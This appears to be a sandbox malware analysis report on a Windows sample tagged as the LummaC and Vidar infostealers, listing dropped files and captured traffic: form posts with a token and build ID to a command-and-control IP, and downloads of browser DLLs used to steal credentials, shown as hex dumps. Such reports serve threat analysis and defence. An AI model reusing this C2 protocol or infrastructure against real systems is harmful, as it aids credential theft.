Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AEBAKJDGHIIJ\BGDGHJ

C:\ProgramData\AEBAKJDGHIIJ\DBFIEH

C:\ProgramData\AEBAKJDGHIIJ\DGCFHI

C:\ProgramData\AEBAKJDGHIIJ\EGIIJD

C:\ProgramData\AEBAKJDGHIIJ\FHCGCA

C:\ProgramData\AEBAKJDGHIIJ\FHCGCA-shm

C:\ProgramData\AEBAKJDGHIIJ\FIDHIE

C:\ProgramData\AEBAKJDGHIIJ\GDHDAE

Windows Analysis Report
file.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-25 18:49:32 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKEBKJJDGHCBGCAAKEHD User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 829 Connection: Keep-Alive Cache-Control: no-cache
2024-09-25 18:49:32 UTC	829	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 45 42 4b 4a 4a 44 47 48 43 42 47 43 41 41 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 34 34 32 66 31 34 63 33 62 63 65 63 34 31 63 64 33 36 64 37 65 34 64 66 34 38 63 35 64 31 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 42 4b 4a 4a 44 47 48 43 42 47 43 41 41 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 62 66 35 65 34 33 31 38 36 39 36 34 33 61 32 61 63 33 39 37 64 32 64 63 30 64 36 38 37 66 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 42 4b 4a 4a 44 47 48 43 42 47 43 41 41 4b 45 48 44 0d 0a 43 6f 6e 74 Data Ascii: ------KKEBKJJDGHCBGCAAKEHDContent-Disposition: form-data; name="token"d442f14c3bcec41cd36d7e4df48c5d17------KKEBKJJDGHCBGCAAKEHDContent-Disposition: form-data; name="build_id"9bf5e431869643a2ac397d2dc0d687fb------KKEBKJJDGHCBGCAAKEHDCont
2024-09-25 18:49:33 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 25 Sep 2024 18:49:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-25 18:49:33 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Timestamp	Bytes transferred	Direction	Data
2024-09-25 18:49:34 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIDHIEBAAKJDHIECAAFH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-09-25 18:49:34 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 34 34 32 66 31 34 63 33 62 63 65 63 34 31 63 64 33 36 64 37 65 34 64 66 34 38 63 35 64 31 37 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 62 66 35 65 34 33 31 38 36 39 36 34 33 61 32 61 63 33 39 37 64 32 64 63 30 64 36 38 37 66 62 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 0d 0a 43 6f 6e 74 Data Ascii: ------FIDHIEBAAKJDHIECAAFHContent-Disposition: form-data; name="token"d442f14c3bcec41cd36d7e4df48c5d17------FIDHIEBAAKJDHIECAAFHContent-Disposition: form-data; name="build_id"9bf5e431869643a2ac397d2dc0d687fb------FIDHIEBAAKJDHIECAAFHCont
2024-09-25 18:49:35 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 25 Sep 2024 18:49:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-25 18:49:35 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Timestamp	Bytes transferred	Direction	Data
2024-09-25 18:49:35 UTC	196	OUT	GET /freebl3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-25 18:49:36 UTC	263	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 25 Sep 2024 18:49:36 GMT Content-Type: application/octet-stream Content-Length: 685392 Connection: close Last-Modified: Wednesday, 25-Sep-2024 18:49:36 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-25 18:49:36 UTC	16121	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
2024-09-25 18:49:36 UTC	16384	IN	Data Raw: 0c ff ff ff 13 bd 10 ff ff ff 01 c8 89 45 b4 11 df 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff Data Ascii: E}1M1XM}}UU1M1UM] EH]EE\|1E1EMMuuU1M1Mu]uM11U\|uuMM1]1x
2024-09-25 18:49:36 UTC	16384	IN	Data Raw: f2 c1 c2 08 89 88 90 00 00 00 31 d6 89 b0 9c 00 00 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 Data Ascii: 1M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]w
2024-09-25 18:49:36 UTC	16384	IN	Data Raw: 8b 7d 08 83 c4 0c 8a 87 18 01 00 00 30 03 8a 87 19 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 Data Ascii: }00C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwE
2024-09-25 18:49:36 UTC	16384	IN	Data Raw: ee 0e 81 e6 fc 03 00 00 33 8e 70 3b 08 10 8b 75 e0 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac Data Ascii: 3p;u^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?Uu
2024-09-25 18:49:36 UTC	16384	IN	Data Raw: 00 00 00 c7 45 bc 00 00 00 00 8d 45 e0 50 e8 04 5a 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 Data Ascii: EEPZ}EPYEPYEPYFMPQW\|EppEPH[FMPQuo=EppEPN@w,0w
2024-09-25 18:49:36 UTC	16384	IN	Data Raw: c4 04 8d 44 24 70 50 e8 5b 1c 04 00 83 c4 04 8d 44 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 Data Ascii: D$pP[D$`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE
2024-09-25 18:49:36 UTC	16384	IN	Data Raw: 8b 7d 88 89 f8 f7 65 c8 89 55 84 89 85 0c fd ff ff 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff Data Ascii: }eUeLXee0@eeeue0UEeeUeee $
2024-09-25 18:49:36 UTC	16384	IN	Data Raw: 77 38 8b 4f 34 89 4d e4 8b 4f 30 89 4d d4 8b 4f 2c 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 Data Ascii: w8O4MO0MO,MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEE
2024-09-25 18:49:36 UTC	16384	IN	Data Raw: e8 1c c1 ee 1a 01 c2 89 95 08 ff ff ff 8b bd 2c ff ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 Data Ascii: ,0<48%8A)$

Timestamp	Bytes transferred	Direction	Data
2024-09-25 18:49:37 UTC	196	OUT	GET /mozglue.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-25 18:49:38 UTC	263	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 25 Sep 2024 18:49:38 GMT Content-Type: application/octet-stream Content-Length: 608080 Connection: close Last-Modified: Wednesday, 25-Sep-2024 18:49:38 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-25 18:49:38 UTC	16121	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
2024-09-25 18:49:38 UTC	16384	IN	Data Raw: 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 31 ff ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 Data Ascii: #H1A$P~#HbA$P~#HUVuF\|FlNhFdFhFTNP
2024-09-25 18:49:38 UTC	16384	IN	Data Raw: ff ff 8b 45 a8 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d Data Ascii: EPzEPWxP1`PHP$,FM1R'^_[]00L9tc
2024-09-25 18:49:38 UTC	16384	IN	Data Raw: e9 06 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 Data Ascii: )0LY)0LZ\|!i(0C}L8!i(0u9Gu)0E8)0}L
2024-09-25 18:49:38 UTC	16384	IN	Data Raw: 00 83 c4 04 89 45 f0 8b 06 8b 4e 04 85 c9 0f 8e b3 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 Data Ascii: EN1B]zB\|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSRE
2024-09-25 18:49:38 UTC	16384	IN	Data Raw: e9 42 fd ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc Data Ascii: BH) sH) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) s
